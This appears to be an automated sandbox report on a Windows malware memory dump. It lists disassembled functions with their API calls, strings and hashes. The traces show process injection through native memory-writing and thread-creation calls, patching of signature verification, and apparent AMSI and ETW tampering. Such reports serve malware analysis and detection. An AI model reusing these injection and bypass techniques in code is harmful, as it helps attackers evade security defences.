Part of subcall function 02907E08: GetFileAttributesA.KERNEL32(00000000,?,0291E18C,ScanString,0293F358,029272FC,OpenSession,0293F358,029272FC,ScanString,0293F358,029272FC,UacScan,0293F358,029272FC,UacInitialize), ref: 02907E13

Part of subcall function 0291C6D4: RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 0291C713
Part of subcall function 0291C6D4: NtCreateFile.NTDLL(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000), ref: 0291C74D
Part of subcall function 0291C6D4: NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0291C77A
Part of subcall function 0291C6D4: NtClose.NTDLL(?), ref: 0291C783

ExitProcess.KERNEL32(00000000,ScanBuffer,0293F358,029272FC,OpenSession,0293F358,029272FC,Initialize,0293F358,029272FC,ScanString,0293F358,029272FC,OpenSession,0293F358,029272FC), ref: 02926F8C

Strings

sppc, xrefs: 02925A2F, 02925A62, 02925A95, 02925AC8, 02926AD0, 02926B03
RtlQueryProcessDebugInformation, xrefs: 0292654C
Initialize, xrefs: 029243A6, 02924596, 02924F56, 02925B66, 02925F04, 02926433, 029268E5, 02926E22
NtAccessCheck, xrefs: 02926CB7
SLIsGenuineLocalEx, xrefs: 02925A7E
FlushInstructionCache, xrefs: 02926879
EnumServicesStatusA, xrefs: 0292655B
NtQueryInformationThread, xrefs: 02926B85
CreateProcessAsUserW, xrefs: 029265D3, 029265F1
RetailTracerEnable, xrefs: 02925C58
SLLoadApplicationPolicies, xrefs: 02925AB1
EnumProcessModules, xrefs: 02926597
Kernel32, xrefs: 029265AB, 029265BA, 029265F6
SxTracerGetThreadContextDebug, xrefs: 02925C8B, 02926A53
NtCreateSection, xrefs: 02926BEB
tquery, xrefs: 02925C6F
GetProcessMemoryInfo, xrefs: 02925CF1
EtwEventWriteEx, xrefs: 02926DB6
EnumServicesStatusExW, xrefs: 02926588
NtQuerySecurityObject, xrefs: 02926C84
CreateProcessWithLogonW, xrefs: 029265E2
NtMapViewOfSection, xrefs: 02926C1E
CreateProcessW, xrefs: 029265B5
NtQueryVirtualMemory, xrefs: 02926B52
NtQuerySystemInformation, xrefs: 0292651F
DlpGetWebSiteAccess, xrefs: 0292608F
sppwmi, xrefs: 02926A9D
Ntdll, xrefs: 02926524, 02926533, 02926542, 02926551
UacScan, xrefs: 02924612, 0292479B, 02924893, 02924A24, 02924BB7, 02924D5D, 02924FD2, 029251EC, 029253CD, 02925566, 02925818
NtOpenSection, xrefs: 02926BB8
UacInitialize, xrefs: 029250F4, 0292660C
MiniDumpReadDumpStream, xrefs: 02924F13
NtOpenFile, xrefs: 02926D83
NtSetSecurityObject, xrefs: 02924F27
OpenSession, xrefs: 0292432A, 0292449E, 0292451A, 02924817, 0292490F, 02924AA0, 02924C33, 02924DD9, 0292504E, 0292533F, 029254C5, 02925720, 02925926, 02925AEA, 02925DD9, 02925E88, 029260C8, 029262BF, 029263B7, 02926688, 02926961, 02926E9E
NtOpenProcess, xrefs: 02924F3B
SLGetSLIDList, xrefs: 02925A4B
SetUnhandledExceptionFilter, xrefs: 029268AC
CryptSIPVerifyIndirectData, xrefs: 02925D24
CreateProcessA, xrefs: 029265A6
kernel32, xrefs: 02926791, 029267C4, 029267F7, 0292682A, 0292685D, 02926890, 029268C3
CreateProcessAsUserA, xrefs: 029265C4
Advapi, xrefs: 02926560, 0292656F, 0292657E, 0292658D, 029265C9, 029265D8, 029265E7
dbgcore, xrefs: 02924F04, 02924F18
LdrLoadDll, xrefs: 02926CEA
NtDeviceIoControlFile, xrefs: 0292652E
SLGetGenuineInformation, xrefs: 02925A18
ntdll, xrefs: 02924EDC, 02924F2C, 02924F40, 029261D1, 02926204, 02926237, 0292626A, 0292629D, 02926B36, 02926B69, 02926B9C, 02926BCF, 02926C02, 02926C35, 02926C68, 02926C9B, 02926CCE, 02926D01, 02926D34, 02926D67, 02926D9A, 02926DCD, 02926E00
VirtualAlloc, xrefs: 0292677A
VirtualProtect, xrefs: 029267E0
DlpNotifyPreDragDrop, xrefs: 02925FF6
MiniDumpWriteDump, xrefs: 02924EFF
DlpCheckIsCloudSyncApp, xrefs: 02926029
VirtualAllocEx, xrefs: 029267AD
DllGetClassObject, xrefs: 02925CBE, 02926A86
NtAlertResumeThread, xrefs: 029261BA
EnumServicesStatusExA, xrefs: 02926579
WriteVirtualMemory, xrefs: 02926846
RtlCreateQueryDebugBuffer, xrefs: 02926286
endpointdlp, xrefs: 0292600D, 02926040, 02926073, 029260A6
NtWaitForSingleObject, xrefs: 02926220
MZP, xrefs: 0292553B
NtQueryDirectoryFile, xrefs: 0292653D
NtReadVirtualMemory, xrefs: 02926C51
SLGatherMigrationBlob, xrefs: 02926AB9
ScanString, xrefs: 02924422, 0292468E, 029252C3, 029256A4, 029259A2, 02925D5D, 02926144, 0292633B, 02926704, 029269DD
OpenProcess, xrefs: 02926813
NtOpenObjectAuditAlarm, xrefs: 02924ED7
SLGetEncryptedPIDEx, xrefs: 02926AEC
BCryptVerifySignature, xrefs: 02925E4F
psapi, xrefs: 0292659C
NtGetWriteWatch, xrefs: 02926B1F
I_QueryTagInformation, xrefs: 02924EEB
DlpGetArchiveFileTraceInfo, xrefs: 0292605C
mssip32, xrefs: 02925D3B
bcrypt, xrefs: 02925E66
EnumServicesStatusW, xrefs: 0292656A
LdrGetProcedureAddress, xrefs: 02926D1D
NtWriteVirtualMemory, xrefs: 02926D50
advapi32, xrefs: 02924EF0
EtwEventWrite, xrefs: 02926DE9
ScanBuffer, xrefs: 0292471F, 0292498B, 02924B1C, 02924CAF, 02924E55, 02925170, 02925449, 029255E2, 0292579C, 029258AA, 02925BE2, 02925F80, 029264AF, 02926F1A
psapi, xrefs: 02925D08
RtlAllocateHeap, xrefs: 029261ED, 02926253
spp, xrefs: 02925CA2, 02925CD5, 02926A6A

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: Process$Current$AddressFileLibraryProc$HandleLoadMemoryModulePathVirtualWrite$AllocateAttributesCloseCounterCreateEnumExitFreeLocalesNameName_PerformanceQuerySystem
String ID: Advapi$BCryptVerifySignature$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
API String ID: 1231712556-1690217862
Opcode ID: aebb87f0468f99e5dd54e222b418f8e2f73fa76c888720642b740e14ed830989
Instruction ID: bdf0b482a9fc222535f517a033dac7f427fda0c66c3c747f5e0ef3d971b384ba
Opcode Fuzzy Hash: aebb87f0468f99e5dd54e222b418f8e2f73fa76c888720642b740e14ed830989
Instruction Fuzzy Hash: 1233FC35A1016D8FDB10EBE4CDC09EEB3F6AFC5314F1054E2E508A7698DA70AE998F51

Function 0291A4DC Relevance: 64.9, APIs: 14, Strings: 22, Instructions: 1861
librarynativeloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02917DF4: LoadLibraryW.KERNEL32(?,00000000,02917EC3), ref: 02917E24
Part of subcall function 02917DF4: GetModuleHandleW.KERNEL32(?,?,00000000,02917EC3), ref: 02917E2A
Part of subcall function 02917DF4: GetProcAddress.KERNEL32(00000000,00000000), ref: 02917E43

GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtOpenProcess,UacScan,0293F358,0291C424,ScanString,0293F358,0291C424,ScanBuffer,0293F358,0291C424,Initialize,0293F358,0291C424,UacScan,0293F358), ref: 0291A7AE
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0291A7B4
NtOpenProcess.NTDLL(0293F560,001F0FFF,0293F324,0293F33C), ref: 0291A8AC

Part of subcall function 02902EE0: QueryPerformanceCounter.KERNEL32 ref: 02902EE4

GetCurrentProcess.KERNEL32(00000000,00000000,?,?,?,?,0000007C,00000000,00000000), ref: 0291ABFF

Part of subcall function 02917924: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02917931
Part of subcall function 02917924: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02917937
Part of subcall function 02917924: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02917957

IsBadHugeReadPtr.KERNEL32(27390000,00000040), ref: 0291AD98
IsBadHugeReadPtr.KERNEL32(?,000000F8), ref: 0291ADC5
GetCurrentProcess.KERNEL32(00000000,17CF3400,00003000,00000040,?,000000F8,27390000,00000040,?,?,0000007C,00000000,00000000), ref: 0291AE1C
GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtWriteVirtualMemory,ScanString,0293F358,0291C424,ScanBuffer,0293F358,0291C424,UacScan,0293F358,0291C424,ScanBuffer,0293F358,0291C424,OpenSession,0293F358), ref: 0291BA5E
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0291BA64
NtWriteVirtualMemory.NTDLL(05350000,05350000,278F0000,17CF3400,00000000,OpenSession,0293F358,0291C424,UacInitialize,0293F358,0291C424,00000000,C:\Windows\System32\ntdll.dll,NtWriteVirtualMemory,ScanString,0293F358), ref: 0291BB75
GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtCreateThreadEx,UacScan,0293F358,0291C424,ScanString,0293F358,0291C424,?,?,0000007C,00000000,00000000), ref: 0291BC63
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0291BC69
NtCreateThreadEx.NTDLL(0293F53C,02000000,0293F324,05351638,05351638,00000000,00000000,00000000,00000000,00000000,00000000,ScanBuffer,0293F358,0291C424,UacInitialize,0293F358), ref: 0291BEE5
CloseHandle.KERNEL32(000005B4,ScanString,0293F358,0291C424,OpenSession,0293F358,0291C424,?,?,0000007C,00000000,00000000), ref: 0291BFE0

Strings

bcrypt, xrefs: 0291C1E0, 0291C1F1, 0291C202
NtOpenProcess, xrefs: 0291A7A4, 0291C345
ScanBuffer, xrefs: 0291A67A, 0291A830, 0291A99B, 0291AB7C, 0291ACF8, 0291AF15, 0291B091, 0291B180, 0291B424, 0291B5FF, 0291B789, 0291B886, 0291B979, 0291BE4F, 0291C040, 0291C08F
MiniDumpWriteDump, xrefs: 0291C312
dbgcore, xrefs: 0291C317, 0291C328
BCryptRegisterProvider, xrefs: 0291C1FD
OpenSession, xrefs: 0291A56B, 0291A92A, 0291AB0B, 0291AC16, 0291AEA4, 0291AFAF, 0291B10F, 0291B303, 0291B495, 0291B58E, 0291B718, 0291B815, 0291BAE9, 0291BD6D, 0291BEEE, 0291BFF1, 0291C100, 0291C286
MiniDumpReadDumpStream, xrefs: 0291C323
I_QueryTagInformation, xrefs: 0291C301
BCryptQueryProviderRegistration, xrefs: 0291C1EC
UacScan, xrefs: 0291A5C4, 0291A752, 0291A7C5, 0291B292, 0291B908, 0291BBEF, 0291BC7D, 0291C171
NtSetSecurityObject, xrefs: 0291C334
NtOpenObjectAuditAlarm, xrefs: 0291C2F0
UacInitialize, xrefs: 0291A8B9, 0291AA29, 0291AC87, 0291AE33, 0291B020, 0291B1F1, 0291B3B3, 0291B51D, 0291B6A7, 0291BA78, 0291BCFC, 0291BDDE, 0291C35D
ScanString, xrefs: 0291A512, 0291A6F9, 0291B9EA, 0291BB7E, 0291BF5F, 0291C215
NtCreateThreadEx, xrefs: 0291BC59
Initialize, xrefs: 0291A61D, 0291AA9A
ntdll, xrefs: 0291C2F5, 0291C339, 0291C34A
advapi32, xrefs: 0291C306
NtWriteVirtualMemory, xrefs: 0291BA54
BCryptVerifySignature, xrefs: 0291C1DB
C:\Windows\System32\ntdll.dll, xrefs: 0291A7A9, 0291BA59, 0291BC5E

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: Handle$AddressModuleProc$Process$CurrentHugeMemoryReadVirtual$AllocateCloseCounterCreateLibraryLoadOpenPerformanceQueryThreadWrite
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Windows\System32\ntdll.dll$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtCreateThreadEx$NtOpenObjectAuditAlarm$NtOpenProcess$NtSetSecurityObject$NtWriteVirtualMemory$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll
API String ID: 3432575501-716930375
Opcode ID: 41abc2e31ba271a54ac4d8c172f044f7a191c0165eb8b859f47c5d480a07d7e4
Instruction ID: 29cf84f659655b42c5c3d7613bc9f2fc948a185adb511e065ffd523ae3637c4e
Opcode Fuzzy Hash: 41abc2e31ba271a54ac4d8c172f044f7a191c0165eb8b859f47c5d480a07d7e4
Instruction Fuzzy Hash: 8EF20935A5015D9FDB11EBA5DCC1EEEB3FAEFC5300F1055A2A109AB294DE70AE418F42

Function 02905A78 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 184
registrystringlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 02905A94
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02905AB2
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02905AD0
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02905AEE
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,02905B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02905B37
RegQueryValueExA.ADVAPI32(?,02905CE4,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,02905B7D,?,80000001), ref: 02905B55
RegCloseKey.ADVAPI32(?,02905B84,00000000,00000000,00000005,00000000,02905B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02905B77
lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02905B94
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02905BA1
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02905BA7
lstrlen.KERNEL32(00000000), ref: 02905BD2
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 02905C19
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02905C29
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 02905C51
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02905C61
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02905C87
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02905C97

Strings

Software\Borland\Locales, xrefs: 02905AA8, 02905AC6
Software\Borland\Delphi\Locales, xrefs: 02905AE4
., xrefs: 02905BE4

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: .$Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1759228003-3917250287
Opcode ID: 485976a529444b44841564a8a7fef536d7ff748ab883940ebec87401d28e1db2
Instruction ID: 4e11b2950730cac7940661eb4169723310cf8899d0d42d928bea30d71b075580
Opcode Fuzzy Hash: 485976a529444b44841564a8a7fef536d7ff748ab883940ebec87401d28e1db2
Instruction Fuzzy Hash: D4518571A4021C7EFF25D6A4CCC6FEF77ADAB48744F8101A5BA04E61C1D7749A448F64

Function 02917A72 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45
librarynativeloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(ntdll,00000000,00000000,02917AF8,?,?,00000000), ref: 02917AB8
GetProcAddress.KERNEL32(00000000,ntdll), ref: 02917ABE
NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02917ADC

Strings

irtualMemory, xrefs: 02917A8D
NtWriteV, xrefs: 02917AA0
ntdll, xrefs: 02917AB3

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: AddressHandleMemoryModuleProcVirtualWrite
String ID: NtWriteV$irtualMemory$ntdll
API String ID: 4260932595-852282483
Opcode ID: bea44d30d37410847fdf787aecd638cc28687bc927574b802407292ad83c8213
Instruction ID: 70e465d5d1376d6fbb601c596ff33e276cc3b593c40b6abc6928ae088266130a
Opcode Fuzzy Hash: bea44d30d37410847fdf787aecd638cc28687bc927574b802407292ad83c8213
Instruction Fuzzy Hash: 14014F75A4420DAFEB00EFE9DC81EAF77EDEB89750B510864B904D3A80D734ED108B60

Function 02917A74 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 44
librarynativeloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(ntdll,00000000,00000000,02917AF8,?,?,00000000), ref: 02917AB8
GetProcAddress.KERNEL32(00000000,ntdll), ref: 02917ABE
NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02917ADC

Strings

irtualMemory, xrefs: 02917A8D
NtWriteV, xrefs: 02917AA0
ntdll, xrefs: 02917AB3

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: AddressHandleMemoryModuleProcVirtualWrite
String ID: NtWriteV$irtualMemory$ntdll
API String ID: 4260932595-852282483
Opcode ID: a936687ad9ce8c1fc91152756cc23435542396158e64b156a6ab3fb621dcf13c
Instruction ID: e7c27738a593a63ee6faee326b23421a903d1bf0927d982e83734d8b275f6971
Opcode Fuzzy Hash: a936687ad9ce8c1fc91152756cc23435542396158e64b156a6ab3fb621dcf13c
Instruction Fuzzy Hash: C5014F75A4420DAFEB00EFD9DC81EAF77EDEB89750B510864B904D3A80D734AD108B60

Function 02917CA8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40
librarynativeloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,0293F384,0291998C,ScanString,0293F384,02919CD0,ScanBuffer,0293F384,02919CD0,Initialize,0293F384,02919CD0,UacScan), ref: 02917CBC
GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02917CD6
NtWriteVirtualMemory.NTDLL(00000000,00000000,0293F368,00000001,0293F374), ref: 02917CFC
FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,0293F384,0291998C,ScanString,0293F384,02919CD0,ScanBuffer,0293F384,02919CD0,Initialize), ref: 02917D12

Strings

bcrypt, xrefs: 02917CBB
BCryptVerifySignature, xrefs: 02917CCF

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
String ID: BCryptVerifySignature$bcrypt
API String ID: 1002360270-4067648912
Opcode ID: f130bb5a5e599edcde5e795d04e495407269260af7347e20e4c6af48801ca9f3
Instruction ID: 888aacfb0565fe503d8c9481bcf0d99daa05bf307f90ad781210269296af3796
Opcode Fuzzy Hash: f130bb5a5e599edcde5e795d04e495407269260af7347e20e4c6af48801ca9f3
Instruction Fuzzy Hash: F4F0AF71E886189EE314AAA9AC84FB673DCAB857D5F000929B114C7580D7785824CB60

Function 02917922 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24
librarymemorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02917931
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02917937
NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02917957

Strings

NtAllocateVirtualMemory, xrefs: 02917927
C:\Windows\System32\ntdll.dll, xrefs: 0291792C

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: AddressAllocateHandleMemoryModuleProcVirtual
String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
API String ID: 421316089-2206134580
Opcode ID: c9d1128f22b2ce5d5b0789dc6c8e33a6d20f3b2eac61d2049013dc66cbb46338
Instruction ID: 5863e2ee2dfa3c59ba31004aebec69c608d91d303d4ebb840a72e7556257ebbc
Opcode Fuzzy Hash: c9d1128f22b2ce5d5b0789dc6c8e33a6d20f3b2eac61d2049013dc66cbb46338
Instruction Fuzzy Hash: 1BE0E5B2A8020DBFDB00EED8E881EEA37ACEB48750F004411BA05C7240D734E9208BA0

Function 02917924 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23
librarymemorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02917931
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02917937
NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02917957

Strings

NtAllocateVirtualMemory, xrefs: 02917927
C:\Windows\System32\ntdll.dll, xrefs: 0291792C

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: AddressAllocateHandleMemoryModuleProcVirtual
String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
API String ID: 421316089-2206134580
Opcode ID: 27a23560499b5dd5805603a3a7e4667451c4e31db6d1eb176fd6c9302d042d3e
Instruction ID: baaa26bc61e54078dcecd1a6ff0beade2b62bf8f33865260c2a1daeb756202ab
Opcode Fuzzy Hash: 27a23560499b5dd5805603a3a7e4667451c4e31db6d1eb176fd6c9302d042d3e
Instruction Fuzzy Hash: 1DE0E5B298020DBFDB00EED8E881EDA37ACAB48750F004401BA05C7240C734E5208BA0

Function 0291C7B8 Relevance: 7.6, APIs: 5, Instructions: 80
nativefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02904ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02904EDA

RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 0291C7F3
NtOpenFile.NTDLL(?,00100001,?,?,00000001,00000020), ref: 0291C823
NtQueryInformationFile.NTDLL(?,?,?,00000018,00000005), ref: 0291C838
NtReadFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0291C864
NtClose.NTDLL(?), ref: 0291C86D

Part of subcall function 02904C0C: SysFreeString.OLEAUT32 ref: 02904C1A

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
String ID:
API String ID: 1897104825-0
Opcode ID: be0b595177dfcf9dc72ff6b814bf0a971b2384090dc7e0f0ec50d9635ca1196a
Instruction ID: a187a04f2c596effcc0c37f42c86f544010325188161af4445897b2568cff0ad
Opcode Fuzzy Hash: be0b595177dfcf9dc72ff6b814bf0a971b2384090dc7e0f0ec50d9635ca1196a
Instruction Fuzzy Hash: A621EE71A5030D7EEB11EAE5CC82FDEB7ADAB48B00F501561B704E61C0D6B4AA058A95

Function 0291CF48 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111networkCOMMON

Download Yara Rule

APIs

InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0291D086

Strings

Initialize, xrefs: 0291CF76
ScanBuffer, xrefs: 0291CFCF
OpenSession, xrefs: 0291D028

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: CheckConnectionInternet
String ID: Initialize$OpenSession$ScanBuffer
API String ID: 3847983778-3852638603
Opcode ID: 3bfc060e9904b7b49f3cd573f0ee94701986d210aca5c04120232d30cc24f4ce
Instruction ID: 5ff0863f9730fc74b4b1a6d873fa53b705c220586c9477d10ce94bc8f108e942
Opcode Fuzzy Hash: 3bfc060e9904b7b49f3cd573f0ee94701986d210aca5c04120232d30cc24f4ce
Instruction Fuzzy Hash: 25410C35A1010D9FEB10EBE5C881EDEB3FAEFC8710F215471E151A7280DA74AD068F65

Function 0291CC94 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0291CCA2
Sleep.KERNEL32(00000000,?,0291D5EC,00000000,029272C7,?,?,00000269,00000000,00000000), ref: 0291CCB4
GetTickCount.KERNEL32 ref: 0291CCB9

Strings

500, xrefs: 0291CCA9

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

